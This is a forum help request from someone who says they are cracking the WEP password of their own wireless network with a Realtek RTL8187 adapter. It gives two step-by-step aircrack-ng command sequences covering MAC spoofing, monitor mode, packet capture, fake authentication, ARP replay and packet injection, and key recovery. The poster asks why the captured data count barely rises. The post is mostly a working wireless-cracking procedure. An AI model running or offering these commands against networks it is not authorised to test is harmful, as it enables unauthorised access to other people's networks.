Hi im trying to get the password of my own internet wireless its WEP protected and the device im using is :realtek rtl8187 , the problem is that everytime i find the network, eventhough the connection is really strong the datas dont rise or its extremely slow and 1 by 1 i used 2 sets of codes please tell me if im missing something that doesnt let the datas rise
thankyou
First method:
Code:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
**Finds all networks**
airodump-ng -c (channel) -w thom --bssid 00:0F:B5:9F:CA:FB wlan0
** while data is rising open a new session**
NEW SESSION:
aireplay-ng -1 0 -a 00:0F:B5:9F:CA:FB -h 00:11:22:33:44:55 wlan0
aireplay-ng -2 -p 6841 -c FF:FF:FF:FF:FF:FF -b 00:0F:B5:9F:CA:FB -h 00:11:22:33:44:55 wlan0
NEW SESSION:
ls
aircrack-ng thom.01.cap
2nd method:
Code:
ifconfig wlan0 up
airmon-ng start wlan0
iwconfig wlan0 rate 1M
airodump-ng wlan0
*** finds all the networks
airodump-ng -c 7 --bssid 00:0F:B5:9F:CA:FB -w /tmp/dump wlan0
** while data is rising open a new session**
NEW SESSIOS:
aireplay-ng -9 wlan0
see if injection is working
aireplay-ng -1 0 -a 00:25:3C:EA:8A:C9 wlan0
*** Association successful :-)
aireplay-ng -3 -x 150 -b 00:25:3C:EA:8A:C9 wlan0
** data increases
after 30k , open 3rd window
aircrack-ng -z /tmp/dump-01.cap
None of these 2 make the datas go up . Please help thankyou